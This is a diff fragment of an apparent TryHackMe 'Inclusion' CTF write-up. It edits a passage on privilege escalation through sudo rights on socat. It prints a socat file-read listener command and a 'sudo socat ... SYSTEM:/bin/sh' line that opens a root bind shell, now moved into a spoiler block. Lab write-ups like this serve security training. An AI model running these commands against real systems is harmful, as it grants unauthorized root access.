Prim1Tive/CTFwriteups/TryHackMe/Inclusion.md

 and we do have a permission to sudo on the socat program (very similar to netcat but with a different syntax)

-a quick search on the web and i found this line of code: "socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]" (alternatively we can use this line to get a Shell and OWN the machine "sudo socat TCP4-LISTEN:4444,reuseaddr  SYSTEM:/bin/sh")
+a quick search on the web and i found this line of code: "socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]"
 <details>
-  <summary>Q1: What is the best Language in the World? </summary>
+  <summary>Own this machine right now and not follow the writeup </summary>
-   A1: JavaScript
+   alternatively we can use this line to get a Shell and OWN the machine "sudo socat TCP4-LISTEN:4444,reuseaddr  SYSTEM:/bin/sh"
 </details>

 ### socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]